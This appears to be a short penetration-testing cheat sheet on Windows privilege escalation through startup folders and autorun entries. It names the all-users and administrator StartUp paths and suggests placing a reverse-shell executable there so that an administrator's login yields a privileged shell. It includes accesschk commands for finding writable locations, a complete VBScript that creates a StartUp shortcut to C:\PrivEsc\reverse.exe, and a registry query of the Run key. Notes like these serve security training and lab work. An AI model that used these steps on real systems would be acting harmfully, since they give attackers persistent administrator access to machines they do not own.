Skip to content

Startup Apps / Autorun

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

  • C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

    • If we have access, we can add a reverseShell.exe, and when admin logs in we will get an admin priv reverse shell.

  • Check access to directory with accesschk.exe:

    • accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

  • Files in StartUp directory must be shortcuts (.lnk)

VBScript to create a shortcut file
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
oLink.Save

cmd cscript CreateShortCut.vbs

Enumerate Auto Run Programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
check for write to file permissions
accesschk.exe /accepteula -quvw <user> <service>